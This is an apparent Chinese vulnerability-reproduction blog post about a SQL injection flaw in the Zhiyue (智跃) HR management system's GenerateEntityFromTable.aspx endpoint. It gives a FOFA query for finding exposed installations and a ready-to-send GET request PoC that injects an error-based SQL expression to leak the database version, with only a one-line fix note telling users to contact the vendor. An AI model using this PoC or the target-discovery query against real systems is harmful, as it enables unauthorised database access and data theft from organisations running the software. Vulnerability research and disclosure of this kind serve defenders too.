当前位置: 首页 > article >正文

智跃人力资源管理系统GenerateEntityFromTable.aspx接口SQL注入漏洞复现 [附POC]

文章目录

  • 智跃人力资源管理系统GenerateEntityFromTable.aspx接口SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

智跃人力资源管理系统GenerateEntityFromTable.aspx接口SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

智跃人力资源管理系统是基于B/S网页端广域网平台,一套考勤系统即可对全国各地多个分公司进行统一管控,成本更低。信息共享更快。跨平台,跨电子设备。

智跃人力资源管理系统GenerateEntityFromTable.aspx接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库中的信息。

0x03 影响版本

智跃人力资源管理系统

0x04 漏洞环境

FOFA语法:app=“ZY-人力资源管理系统”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /resource/utils/GenerateEntityFromTable.aspx?t=1%27%2B(SELECT%20CHAR(103)%2BCHAR(87)%2BCHAR(114)%2BCHAR(112)%20WHERE%201669%3D1669%20AND%206492%20IN%20(select+@@Version))%2B%27 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

3.复现

在这里插入图片描述

0x06 修复建议

官方暂已修复该漏洞,请用户联系厂商修复漏洞:

http://www.zyehr.com

http://www.kler.cn/a/157803.html

相关文章:

  • 微软 Power Platform 零基础 Power Pages 网页搭建教程学习实践(一)
  • 计算机网络之IP篇
  • C/C++---------------LeetCode第27. 移除元素
  • SSM框架(四):SSM整合 案例 + 异常处理器 +拦截器
  • 如何提高Pycharm的使用体验?
  • OpenGL学习(一)绘制一个图形
  • Redis高可用之Sentinel哨兵模式
  • Apache Doris 详细教程(三)
  • Django大回顾-4 自定义过滤器和标签、模型层
  • 某60区块链安全之JOP实战一学习记录
  • 重磅 | 国内首款带DESAT保护功能兼容光耦SLMi330CG-DG完美兼容ACPL-330J
  • 安卓apk抓包(apk抓不到包怎么办)
  • STM32(PWM、ADC)
  • GPC-数据鉴别(DAP)模式验证
  • 【华为OD机试python】分割数组的最大差值【2023 B卷|100分】
  • 【分布式算法】Raft算法详解
  • 「Go框架」gin框架是如何处理panic的?
  • 使用CRM:提升小微企业的客户满意度
  • OpenCV Mat和Bitmap的转换
  • Java集合常见问题